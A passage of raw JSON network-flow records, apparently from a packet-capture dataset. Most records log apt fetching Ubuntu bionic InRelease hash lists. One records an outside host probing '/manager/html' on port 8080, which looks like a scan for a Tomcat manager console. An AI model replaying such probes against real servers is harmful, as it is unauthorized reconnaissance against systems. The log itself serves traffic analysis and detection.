","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1099\r\nDate: Wed, 06 Apr 2022 08:59:05 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1099,"flow_id":"902689fa-9e97-4a31-a50a-e6b66fbac048","http_comment":"HTTP/1.1 404 ","http_content_length":1099,"http_content_type":"text/html;charset=utf-8","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /manager/html HTTP/1.1","src_headers":"GET /manager/html HTTP/1.1\r\nConnection: close\r\nUser_Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36\r\n\r\n","src_ip":"45.61.184.91","src_mac":"02:A5:92:DA:49:85","src_port":53004,"status":404,"time_taken":84738,"transport":"tcp","uri":"/manager/html","uri_path":"/manager/html"} {"endtime":"2022-04-06T08:42:14.007424Z","timestamp":"2022-04-06T08:42:13.467353Z","bytes":89250,"bytes_in":217,"bytes_out":89033,"dest_content":"-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nOrigin: Ubuntu\nLabel: Ubuntu\nSuite: bionic-security\nVersion: 18.04\nCodename: bionic\nDate: Wed, 06 Apr 2022 7:02:54 UTC\nArchitectures: amd64 arm64 armhf i386 ppc64el s390x\nComponents: main restricted universe multiverse\nDescription: Ubuntu Bionic Security\nMD5Sum:\n fd835942609da2884e684e2681afeab6 3166212985 Contents-amd64\n ff8bc4b1e43974437a3fb1703e798f6a 175136234 Contents-amd64.gz\n bf63469c4cc5c618c875947622475eea 2316131468 Contents-arm64\n 50bda9d5ac8f901066af74e6f25cf2ad 124240558 Contents-arm64.gz\n 54ceaf944df13c3715563bab88bfa7bc 2176071513 Contents-armhf\n fe867fcac358ba78af18b10404d4a498 116353107 Contents-armhf.gz\n 6053e1296fca95ba450b225f2f8a82f2 1822346772 Contents-i386\n efb8788ef23d38b9e18428ddf556102c 98818823 Contents-i386.gz\n a4a6ba8cfaa3cd05b89e1f7632ee4320 1511589740 Contents-ppc64el\n fe11bb1e916ed8a71350f35e56eebb5d 81156419 Contents-ppc64el.gz\n 7ac08b7f183392d9c7869d177492c5ce 1337741962 Contents-s390x\n 37cbe0e8b819662ecd8fd0e66959e969 71039625 Contents-s390x.gz\n 4bdfac68ed2621a89a6cda3440f39cde 12167838 main/binary-amd64/Packages\n 8e037ca7f79af3620e409cfa632b2b8b 2692828 main/binary-amd64/Packages.gz\n 2fc0a11dd0f590f28db04e656c06717f 2169760 main/binary-amd64/Packages.xz\n 1818534a52f5cc70df58d191045df1c2 105 main/binary-amd64/Release\n fc0499332b96cd493d347201909d3fae 6171071 main/binary-arm64/Packages\n 0100a9c092cb6457acee64f0b0aa8447 1471889 main/binary-arm64/Packages.gz\n 975e225037ca157246cdaddc171b21b5 1178576 main/binary-arm64/Packages.xz\n 931537f08e88016cdf8122ab1ce588ea 105 main/binary-arm64/Release\n 5c03df7499b6a307f49400162c27fb92 4983555 main/binary-armhf/Packages\n ed9814a684462238340c8348bec06e18 1199543 main/binary-armhf/Packages.gz\n 4d0cbd533a23084f59e12545086c88df 963288 main/binary-armhf/Packages.xz\n 6145e2571ffe7475e243a05612b60ddd 105 main/binary-armhf/Release\n ae7a57c576b7220b39c1123fd3dd2cc9 5986021 main/binary-i386/Packages\n c217743a9e9075fb0ede82086f60e4a5 1426455 main/binary-i386/Packages.gz\n c37607ed9856421bce7a2f4e8080f480 1146880 main/binary-i386/Packages.xz\n b1321054d275ad86097d8553835d90e9 104 main/binary-i386/Release\n b22a4c76cd0985b473496fbba75b29ab 4704636 main/binary-ppc64el/Packages\n 6f6513a7f00fbfc67bffcd8b7a999366 1132085 main/binary-ppc64el/Packages.gz\n 11e2d79986b39b6292a77d41316dab05 904152 main/binary-ppc64el/Packages.xz\n 9cf240696ecdc2983ef2caf940a69def 107 main/binary-ppc64el/Release\n 0158fe5d8f8b81244172b0dab61923d7 4426598 main/binary-s390x/Packages\n b27e8e1c37592049e7442e75f20c14fa 1082962 main/binary-s390x/Packages.gz\n 754e9090ce441ce7ab9432aece300984 865052 main/binary-s390x/Packages.xz\n 17565ef40ea0ed93ab07afe40a85be1b 105 main/binary-s390x/Release\n c833de772d7680198d2c01210bbf31c3 6248277 main/debian-installer/binary-amd64/Packages\n 93cbde2168aa67febf6728918bfa5ac1 1517842 main/debian-installer/binary-amd64/Packages.gz\n 2de43855078b150b5387f8c3289c445c 1183048 main/debian-installer/binary-amd64/Packages.xz\n 805a35474ff628fa4e5dfbee65db1278 4084611 main/debian-installer/binary-arm64/Packages\n b5aeafb548b33d345946b17609da10de 984149 main/debian-installer/binary-arm64/Packages.gz\n 57e7cea419a3675bb64e0da81fb50f77 768708 main/debian-installer/binary-arm64/Packages.xz\n 1e7529ee2e643e3a058a932f33d004ac 6345491 main/debian-installer/binary-armhf/Packages\n 91e8cf5ed4b7d3cb8f8440f7340a1f68 1492410 main/debian-installer/binary-armhf/Packages.gz\n e3d288fb51fb9c63a5dd6015b536d2b6 1189892 main/debian-installer/binary-armhf/Packages.xz\n 20456ac736c4cf0cb28cf4b92639594a 4750820 main/debian-installer/binary-i386/Packages\n ef49c9b747135f28e056d4be0a8066c0 1166531 main/debian-installer/binary-i386/Packages.gz\n fe0aaa0e9a25a1544432a01f2543d361 905240 main/debian-installer/binary-i386/Packages.xz\n 267af7dd5519c28c3f0081ca1c8ec559 3263234 main/debian-installer/binary-ppc64el/Packages\n ab26dc083eb21236675ba8b579748108 787285 main/debian-installer/binary-ppc64el/Packages.gz\n 6b929365310c8fab2bb52afb87321a87 612624 main/debian-installer/binary-ppc64el/Packages.xz\n 3f570475155e9a828c731ed892b20346 2351872 main/debian-installer/binary-s390x/Packages\n f74764c9e72dd00daf8818fc2dfccdcc 568477 main/debian-installer/binary-s390x/Packages.gz\n 838068145a3258ddf3568c96dfa9e438 444240 main/debian-installer/binary-s390x/Packages.xz\n 9d9113b0eeb99178978f7f435799762b 222435 main/dep11/Components-amd64.yml\n 1eb8588ae3b89edc13abb463fdf5c024 67540 main/dep11/Components-amd64.yml.gz\n a402444b4cd2bb7678ab9980a0532b7c 55224 main/dep11/Components-amd64.yml.xz\n bfbbd60ceac61c621ec03e0692ded0f0 196713 main/dep11/Components-arm64.yml\n 3bbfaf55c4b448925aa91b32175c33f6 59551 main/dep11/Components-arm64.yml.gz\n 419241dbe929de404ed84188dded03f4 49212 main/dep11/Components-arm64.yml.xz\n dd55e6edf735f9358a9d8d74d3348f0e 196713 main/dep11/Components-armhf.yml\n 8dc4758ff02ee8d6478f0a879ae8506e 60080 main/dep11/Components-armhf.yml.gz\n f828146b2a6a34de1898980be396c20d 49120 main/dep11/Components-armhf.yml.xz\n daaa1598cc099355de1b91b266096d5c 222435 main/dep11/Components-i386.yml\n 69d6dcd6ae861f81cd86ef76344ac936 68870 main/dep11/Components-i386.yml.gz\n ca277f7e10c42110fd83a56e21f819d4 55268 main/dep11/Components-i386.yml.xz\n e902d864fadb4817a62b5af2901f94b1 196713 main/dep11/Components-ppc64el.yml\n 876775a6965a2fc6ba7f7acae92b495d 61591 main/dep11/Components-ppc64el.yml.gz\n 2b6ca614689e7e5bdb9d8fe80d41ce80 49168 main/dep11/Components-ppc64el.yml.xz\n da900912eee8da829fd94aaa97f68b35 187593 main/dep11/Components-s390x.yml\n 5790f36af3fff3a449ecc47046f53aa5 57835 main/dep11/Components-s390x.yml.gz\n d8d97bfacc4ea11303df5d19f07312dc 46288 main/dep11/Components-s390x.yml.xz\n 4321832e0d4ff886a08d6ddfd54e0386 157184 main/dep11/icons-128x128.tar\n ee2de4f93e1a9865a0dd158f62d2c995 144386 main/dep11/icons-128x128.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 main/dep11/icons-128x128@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 main/dep11/icons-128x128@2.tar.gz\n fe5f61f9e85c36f9b311dbb14d004b3c 41472 main/dep11/icons-48x48.tar\n a1efc42b1d56cabedb6a6dea824e39ef 28911 main/dep11/icons-48x48.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 main/dep11/icons-48x48@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 main/dep11/icons-48x48@2.tar.gz\n a83cdcc99338c021634232ba71319cbf 77824 main/dep11/icons-64x64.tar\n 65fb245d141987d1d63264edfc6681cc 65084 main/dep11/icons-64x64.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 main/dep11/icons-64x64@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 main/dep11/icons-64x64@2.tar.gz\n 2d02c88de3c0e6d0a224b2f7a8c4c9fa 207 main/i18n/Index\n c8e5b3ed2b1cf71b92f814e57a435adb 9105793 main/i18n/Translation-en\n 63edcb10ab3a1b8d58cedd3bf1641eb3 546950 main/i18n/Translation-en.gz\n ad06bf7994535bdc56c31a3b8b8aa1f5 379720 main/i18n/Translation-en.xz\n 7c7879a5ca03e93fefa85aa8bcb669fc 106 main/source/Release\n 444519aabe2848695e896213139887ee 1362590 main/source/Sources\n 471ba1e4febf695d84603ca8da159678 332718 main/source/Sources.gz\n d9fe545db3bba6de9b5e8c60731199d6 263228 main/source/Sources.xz\n 49ebb50b77f4eb0f83876707e3d4dd44 89903 multiverse/binary-amd64/Packages\n 48e6bb94a19fb39662ff8a3dfb8a9178 21106 multiverse/binary-amd64/Packages.gz\n e45a38d84b789378fd05cd098cb26741 17604 multiverse/binary-amd64/Packages.xz\n c43d71f0b741b33cbe49b2e0f22ad7d4 111 multiverse/binary-amd64/Release\n 34e4465f8192f7c4a4ee1c422e4b609b 8161 multiverse/binary-arm64/Packages\n 621ee807659a8f48cc8b7dcc900cc463 2759 multiverse/binary-arm64/P74adfc6903d59a449cbdb0 40 multiverse/debian-installer/binary-ppc64el/Packages.gz\n 0822ff38e3740008591bbf97f776e4b4 64 multiverse/debian-installer/binary-ppc64el/Packages.xz\n d41d8cd98f00b204e9800998ecf8427e 0 multiverse/debian-installer/binary-s390x/Packages\n e62ff0123a74adfc6903d59a449cbdb0 40 multiverse/debian-installer/binary-s390x/Packages.gz\n 0822ff38e3740008591bbf97f776e4b4 64 multiverse/debian-installer/binary-s390x/Packages.xz\n aafc281d1809eace6b3459f41f5eb6b1 7240 multiverse/dep11/Components-amd64.yml\n 0022f148c3399b96cf68be3e4983783f 2540 multiverse/dep11/Components-amd64.yml.gz\n 95cdd01637d4a7c60df32f66bdf6beb7 2464 multiverse/dep11/Components-amd64.yml.xz\n 5509c3a571c5b5dd4d27bf263394a547 7240 multiverse/dep11/Components-i386.yml\n fb7f58354633037129fc31dfc5d41054 2540 multiverse/dep11/Components-i386.yml.gz\n 7da32748604229990ff437decb9bee7b 2464 multiverse/dep11/Components-i386.yml.xz\n 0f343b0931126a20f133d67c2b018a3b 1024 multiverse/dep11/icons-128x128.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 multiverse/dep11/icons-128x128.tar.gz\n 0f343b0931126a20f133d67c2b018a3b 1024 multiverse/dep11/icons-128x128@2.tar\n 31f6566d35ccd604be46ed5b1f813cdf 29 multiverse/dep11/icons-128x128@2.tar.gz\n 0f343b0931126a20f133d67c2b018a3b ","dest_headers":"HTTP/1.1 200 OK\r\nDate: Wed, 06 Apr 2022 08:42:13 GMT\r\nServer: Apache/2.4.29 (Ubuntu)\r\nLast-Modified: Wed, 06 Apr 2022 08:02:00 GMT\r\nETag: \"15a94-5dbf7c6aa2e00\"\r\nAccept-Ranges: bytes\r\nContent-Length: 88724\r\nCache-Control: max-age=886, s-maxage=3300, proxy-revalidate\r\nExpires: Wed, 06 Apr 2022 08:57:00 GMT\r\n\r\n","dest_ip":"185.125.190.39","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":88724,"flow_id":"7030ab45-9408-45ef-b39f-e80796d3a3e3","http_comment":"HTTP/1.1 200 OK","http_content_length":88724,"http_method":"GET","http_user_agent":"Debian APT-HTTP/1.3 (1.6.14)","protocol_stack":"ip:tcp:http","request":"GET /ubuntu/dists/bionic-security/InRelease HTTP/1.1","server":"Apache/2.4.29 (Ubuntu)","site":"security.ubuntu.com","src_headers":"GET /ubuntu/dists/bionic-security/InRelease HTTP/1.1\r\nHost: security.ubuntu.com\r\nCache-Control: max-age=0\r\nAccept: text/*\r\nIf-Modified-Since: Tue, 05 Apr 2022 15:09:00 GMT\r\nUser-Agent: Debian APT-HTTP/1.3 (1.6.14)\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":37614,"status":200,"time_taken":540085,"transport":"tcp","uri":"/ubuntu/dists/bionic-security/InRelease","uri_path":"/ubuntu/dists/bionic-security/InRelease"} {"endtime":"2022-04-06T08:42:13.278717Z","timestamp":"2022-04-06T08:42:13.274539Z","bytes":75085,"bytes_in":231,"bytes_out":74854,"dest_content":"/Index\n 556d19516769bf7f5afabc1def8595d3a94df039 13506 main/i18n/Translation-en\n f2c4282b87c560dfd9aef8453694724635d31aba 5134 main/i18n/Translation-en.gz\n 40c021549d3de5eb25e5dbd2eff83f58f3388700 5016 main/i18n/Translation-en.xz\n 09e08bc3d45f1f06524036062fd9483c6ab0f771 107 main/source/Release\n 5e8cf5390eabee377186f47a65fbd742208b2b45 20278 main/source/Sources\n 89575029e113b3f418505c9235544b887f23ef07 6591 main/source/Sources.gz\n 81be747e6afc0cd7ec85b563a7f3494340302f29 6128 main/source/Sources.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/binary-amd64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/binary-amd64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/binary-amd64/Packages.xz\n 5d001c90fe151b9f345c7eaad4384197faa95a98 112 multiverse/binary-amd64/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/binary-arm64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/binary-arm64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/binary-arm64/Packages.xz\n ef92d5dbdb6896b2bccaa3e5ec77736ad55c2baf 112 multiverse/binary-arm64/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/binary-armhf/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/binary-armhf/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/binary-armhf/Packages.xz\n 1303f772dc65804a92d362a4cb133db84f972d1c 112 multiverse/binary-armhf/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/binary-i386/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/binary-i386/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/binary-i386/Packages.xz\n 6811dc5378b3e8dac3c0d7c5c7bf42bc5c7b990e 111 multiverse/binary-i386/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/binary-ppc64el/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/binary-ppc64el/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/binary-ppc64el/Packages.xz\n db332729fa9426e48a010518118e7d4059bf163b 114 multiverse/binary-ppc64el/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/binary-s390x/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/binary-s390x/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/binary-s390x/Packages.xz\n b1b4b7308e1396e7a9d5d92d5c2daec2effaa89c 112 multiverse/binary-s390x/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/debian-installer/binary-amd64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/debian-installer/binary-amd64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/debian-installer/binary-amd64/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/debian-installer/binary-arm64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/debian-installer/binary-arm64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/debian-installer/binary-arm64/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/debian-installer/binary-armhf/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/debian-installer/binary-armhf/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/debian-installer/binary-armhf/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/debian-installer/binary-i386/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/debian-installer/binary-i386/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/debian-installer/binary-i386/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/debian-installer/binary-ppc64el/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/debian-installer/binary-ppc64el/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/debian-installer/binary-ppc64el/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/debian-installer/binary-s390x/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/debian-installer/binary-s390x/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/debian-installer/binary-s390x/Packages.xz\n 7a5402b7cb01cacb230b9af85db4a0b8965b6a31 192 multiverse/i18n/Index\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/i18n/Translation-en\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/i18n/Translation-en.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/i18n/Translation-en.xz\n ce7c795a58d8a4743153013a47ae9f639c41b24d 113 multiverse/source/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 multiverse/source/Sources\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 multiverse/source/Sources.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 multiverse/source/Sources.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/binary-amd64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/binary-amd64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/binary-amd64/Packages.xz\n 92be8c3a22b6f1c8da51f36d5b5f363c89864291 112 restricted/binary-amd64/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/binary-arm64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/binary-arm64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/binary-arm64/Packages.xz\n fe26aa6603a594b59d5502087ab3024f451025cd 112 restricted/binary-arm64/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/binary-armhf/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/binary-armhf/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/binary-armhf/Packages.xz\n fab616fb8ce4171a39cd42066ec32278145af42a 112 restricted/binary-armhf/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/binary-i386/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/binary-i386/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/binary-i386/Packages.xz\n 77b97d8511ae1779677e9a46f82fcf6246a72f74 111 restricted/binary-i386/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/binary-ppc64el/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/binary-ppc64el/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/binary-ppc64el/Packages.xz\n 82feec05e6923737b35abda797009ae9e964a8f4 114 restricted/binary-ppc64el/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/binary-s390x/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/binary-s390x/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/binary-s390x/Packages.xz\n a2e91b5d332924c029f1815f22cd3192292006c0 112 restricted/binary-s390x/Release\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/debian-installer/binary-amd64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/debian-installer/binary-amd64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/debian-installer/binary-amd64/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/debian-installer/binary-arm64/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/debian-installer/binary-arm64/Packages.gz\n 93be694d205263480513918c793e2fb2e1cdc051 64 restricted/debian-installer/binary-arm64/Packages.xz\n da39a3ee5e6b4b0d3255bfef95601890afd80709 0 restricted/debian-installer/binary-armhf/Packages\n e3f4c61a216c2c9613cd3bdd1420dde095b296b3 40 restricted/debian-installer/binary-armhf/Packages.gz\n 93be694d205263480513918c7","dest_headers":"HTTP/1.1 200 OK\r\nDate: Wed, 06 Apr 2022 08:42:13 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nLast-Modified: Wed, 06 Apr 2022 07:12:00 GMT\r\nETag: \"12342-5dbf713d9d000\"\r\nAccept-Ranges: bytes\r\nContent-Length: 74562\r\nCache-Control: max-age=0, proxy-revalidate\r\nExpires: Wed, 06 Apr 2022 08:42:13 GMT\r\n\r\n","dest_ip":"34.212.136.213","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":74562,"flow_id":"d728ace9-5f27-4d1f-9869-fb6e815d3ddf","http_comment":"HTTP/1.1 200 OK","http_content_length":74562,"http_method":"GET","http_user_agent":"Debian APT-HTTP/1.3 (1.6.14)","protocol_stack":"ip:tcp:http","request":"GET /ubuntu/dists/bionic-backports/InRelease HTTP/1.1","server":"Apache/2.4.18 (Ubuntu)","site":"us-west-2.ec2.archive.ubuntu.com","src_headers":"GET /ubuntu/dists/bionic-backports/InRelease HTTP/1.1\r\nHost: us-west-2.ec2.archive.ubuntu.com\r\nCache-Control: max-age=0\r\nAccept: text/*\r\nIf-Modified-Since: Tue, 05 Apr 2022 15:09:00 GMT\r\nUser-Agent: Debian APT-HTTP/1.3 (1.6.14)\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":46490,"status":200,"time_taken":4186,"transport":"tcp","uri":"/ubuntu/dists/bionic-backports/InRelease","uri_path":"/ubuntu/dists/bionic-backports/InRelease"} {"endtime":"2022-04-06T08:42:13.273283Z","timestamp":"2022-04-06T08:42:13.269616Z","bytes":89243,"bytes_in":229,"bytes_out":89014,"dest_content":"-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nOrigin: Ubuntu\nLabel: Ubuntu\nSuite: bionic-updates\nVersion: 18.04\nCodename: bionic\nDate: Wed, 06 Apr 2022 7:03:56 UTC\nArchitectures: amd64 arm64 armhf i386 ppc64el s390x\nComponents: main restricted universe multiverse\nDescription: Ubuntu Bionic Updates\nMD5Sum:\n a18abfe278261f4547369220f6fa3933 3365270939 Contents-amd64\n 0adba9e7f2b16235688eb9c7317494a3 186278863 Contents-amd64.gz\n ebf0c334037e862d5f384d04fe0eadee 2468737484 Contents-arm64\n 33cd9cc6904e05dc2bdff0636ef0017b 132767938 Contents-arm64.gz\n 9062773fe29095321e42c8bec9bb1b65 2328289622 Contents-armhf\n 0548df5f324520203caeb90841f99eb7 124857239 Contents-armhf.gz\n 0de158aa770f490b5def5ec878d0972b 1964418235 Contents-i386\n 338771a880e1cd1481534f8b71994916 106796210 Contents-i386.gz\n b7735bb33d5716bfe99fb883914b8de8 1637239547 Contents-ppc64el\n f618a7207833455f82f9132c69d84abc 88215302 Contents-ppc64el.gz\n b0e774235054f1077592ff3e4f50ddb7 1446596219 Contents-s390x\n d746e4241fb758a5b9e3f2cd7e5ffa12 77119770 Contents-s390x.gz\n 91ff003f7221e2c9dd9290c9899df889 13987968 main/binary-amd64/Packages\n 0d41f6097d375455de251418d387a67f 3131552 main/binary-amd64/Packages.gz\n d963e8a9b7c3425c5568c93e5134248d 2515540 main/binary-amd64/Packages.xz\n 3789a40ee9beee46769a3f9dc077dfcd 104 main/binary-amd64/Release\n 811c09b663db5b853b18018d211f0c3e 7737915 main/binary-arm64/Packages\n 859edc0c66b88b622fd00152a5fd9e1a 1857560 main/binary-arm64/Packages.gz\n 7efbd568a1f6c65a6952bd4e5d6f4ca3 1479004 main/binary-arm64/Packages.xz\n 6df14c81f3a62b769ef36531eba079a2 104 main/binary-arm64/Release\n cb3161e87f5076f41fcebe7b4bf97bb9 6503093 main/binary-armhf/Packages\n cd9560d7ad59af654328d29470682b8a 1575068 main/binary-armhf/Packages.gz\n 2e7d8f9858c96f10b0087829a6ccb86b 1255524 main/binary-armhf/Packages.xz\n 5f365d611aaa25fa42dec683a24a3429 104 main/binary-armhf/Release\n 57dad3bda5acbfa72f4a28e6d3f555d8 7570194 main/binary-i386/Packages\n 5a2929fb0d26ccdbc5d710feb17f8040 1818108 main/binary-i386/Packages.gz\n 8e89aed9e36a655fa68c384ce8633f4d 1451892 main/binary-i386/Packages.xz\n ef8ee78d6a8f11dc7d120ee4b3fedf84 103 main/binary-i386/Release\n 79b05a813c5e041482634277e4453f48 6216380 main/binary-ppc64el/Packages\n dab693db9dd7a4d802a42f39a2f0862f 1504022 main/binary-ppc64el/Packages.gz\n 3a67bf4142c5efeb95bbc92e73db4221 1193636 main/binary-ppc64el/Packages.xz\n 33eb5ecc6df80308f564f5c5f3b9e313 106 main/binary-ppc64el/Release\n fbb8d4eb559e191f2d641387e80716ce 5921039 main/binary-s390x/Packages\n 9f6bccd22fe79496c0e70ea3c73ab369 1452787 main/binary-s390x/Packages.gz\n 5ca643e96c4aa0b7494d4f36e90492ac 1152912 main/binary-s390x/Packages.xz\n fcb80b10e0ab763b10aee42df722e489 104 main/binary-s390x/Release\n f2252dfd61f70cfdea9ab7f9c7a1e0d9 6586864 main/debian-installer/binary-amd64/Packages\n ef11d50be7fce41947ba25e706b4a356 1604365 main/debian-installer/binary-amd64/Packages.gz\n 251c16553da40161e4015bf843028168 1249552 main/debian-installer/binary-amd64/Packages.xz\n 704ec8b3279375abd00553bc69f1e9c4 4350563 main/debian-installer/binary-arm64/Packages\n 53920d4315452231038eb38745d9c7ef 1052854 main/debian-installer/binary-arm64/Packages.gz\n 666af2b0901225a1c532cc6d38ff75c4 821732 main/debian-installer/binary-arm64/Packages.xz\n 55aeebbf7cce733fe1f1ff41e0ae0ccf 6670775 main/debian-installer/binary-armhf/Packages\n b989d21e5c1c2370f19772b7a50400d2 1574260 main/debian-installer/binary-armhf/Packages.gz\n a81e6af37fdc7e12a8e0511ad9fa0df1 1254560 main/debian-installer/binary-armhf/Packages.xz\n 625c9d218e11681c6308812c9f361c22 4994102 main/debian-installer/binary-i386/Packages\n 1d2f2685ac23784fc411129047686cd0 1230913 main/debian-installer/binary-i386/Packages.gz\n 6c623d9c591245f5964ea23db4ba7670 954480 main/debian-installer/binary-i386/Packages.xz\n b905d3da751d7635c30c4234e7d6844b 3451465 main/debian-installer/binary-ppc64el/Packages\n de235a58fbb9370251d819a46cb1fb73 837506 main/debian-installer/binary-ppc64el/Packages.gz\n 7aa967c496299937ae6c369278ab022c 651212 main/debian-installer/binary-ppc64el/Packages.xz\n 30c3d1dd971ef9158f350e905c1fc3f6 2498975 main/debian-installer/binary-s390x/Packages\n 3580339b0bf22fc4f633b95ec37f1acc 608643 main/debian-installer/binary-s390x/Packages.gz\n 7a762cc1c1308ba683501ed5e8f20466 475304 main/debian-installer/binary-s390x/Packages.xz\n 604a6af788eb1cb69aa57d8a7250e6ea 1240188 main/dep11/Components-amd64.yml\n a7591a602e6bdb1b6469ed94262e058a 411243 main/dep11/Components-amd64.yml.gz\n b171568575ce94af8fec5d7593456594 296632 main/dep11/Components-amd64.yml.xz\n 23da67571e80da3388eaf1fb1db0a143 1214466 main/dep11/Components-arm64.yml\n f4b1a2a228e30f956746309379602e6f 404237 main/dep11/Components-arm64.yml.gz\n 8adebcbc5ac0bfedebab0d9f7887545b 291480 main/dep11/Components-arm64.yml.xz\n d2bf52787464fc82c827302b28cc309a 1214466 main/dep11/Components-armhf.yml\n 7bdf28cb0a48cf847e73686e2ac5f0f4 404041 main/dep11/Components-armhf.yml.gz\n 12c12604992f2fcdcedc6261901b9155 291520 main/dep11/Components-armhf.yml.xz\n 0909e29e55a48eab5fd9267a5dcf11a6 1240188 main/dep11/Components-i386.yml\n b34d73d83f8c30d8739d9d6ec0a8758d 410661 main/dep11/Components-i386.yml.gz\n d3d3633b671947918ca8aa73ab29601a 296456 main/dep11/Components-i386.yml.xz\n 334998dc8804958e80f3fe51da1a7284 1209982 main/dep11/Components-ppc64el.yml\n c21cc0cea003ea9f8b882c461a92c1a5 402752 main/dep11/Components-ppc64el.yml.gz\n 6b1613852e2cfabff876d50e77873e58 290752 main/dep11/Components-ppc64el.yml.xz\n a5d748bd8d3ecfd8c6c0732d44537114 1192669 main/dep11/Components-s390x.yml\n 22e2c48f9878cd1607a0ba010a61b809 395953 